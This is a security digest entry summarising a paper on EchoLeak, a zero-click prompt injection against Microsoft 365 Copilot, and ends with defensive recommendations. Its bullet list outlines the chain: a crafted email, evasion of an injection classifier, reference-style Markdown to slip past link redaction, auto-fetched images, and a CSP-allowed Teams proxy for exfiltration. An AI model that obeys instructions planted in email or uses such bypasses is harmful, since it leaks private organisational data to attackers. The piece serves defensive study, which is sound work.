arXiv — EchoLeak: zero-click prompt injection in Microsoft 365 Copilot

• Category: Security

AI relevance: this is a concrete, real-world chain that turns untrusted inbound content (an email) into privileged tool/data access (Copilot context) and then into exfiltration (network fetch/proxy), without a user click.

  • Paper: EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System (arXiv:2509.10540).
  • Vuln identifier: the paper frames EchoLeak as CVE-2025-32711 in Microsoft 365 Copilot.
  • Zero-click angle: the attacker’s input is a single crafted email; no “please run this tool” user interaction is required (per the paper’s claim).
  • The core failure mode: once the model ingests attacker-controlled content, it can be coerced into treating that content as instructions and crossing a trust boundary into tenant/private context.
  • It’s not “just a prompt”: the chain relies on product behaviors around classification, Markdown rendering, and auto-fetching external resources.
  • Defense bypasses (as described): evading an XPIA classifier, using reference-style Markdown to dodge link redaction, and triggering auto-fetched images.
  • Exfil path (as described): abusing a Microsoft Teams proxy allowed by CSP to transmit data out.
  • Lesson: LLM “safety filters” are not a security boundary; you need architectural boundaries + least privilege around data and tools.

Why it matters

  • Copilots collapse trust zones: an agent that can read email and reach internal docs is effectively a cross-domain bridge; prompt injection is how attackers drive across it.
  • Zero-click changes the threat model: if ingestion alone is enough, then phishing becomes “send one message” rather than “get a click.”
  • AI ops is web ops: renderers, link rewriting, image fetchers, and proxy allowlists become part of your AI attack surface.
  • Generalizable pattern: attackers chain “small” behaviors (rendering + fetch + allowlist) into a full exfil workflow — exactly what agents are built to do.

What to do

  1. Map trust boundaries: explicitly document which inputs are untrusted (email, web, tickets) and ensure agent/tool actions cannot cross into sensitive stores without provenance-based checks.
  2. Kill auto-fetch where you can: treat any automatic external resource fetch (images/URLs) as an exfil primitive; gate, proxy, and log it.
  3. Constrain egress: restrict outbound network paths from copilots/agent runtimes; prefer explicit allowlists over “general internet.”
  4. Hard-enforce provenance: propagate “this originated from external email” metadata through the pipeline and use it to deny access to high-sensitivity connectors.
  5. Red-team your agent chains: test multi-step attacks that mix prompt injection + rendering tricks + tool calls; single-turn jailbreak tests miss the real risk.

Links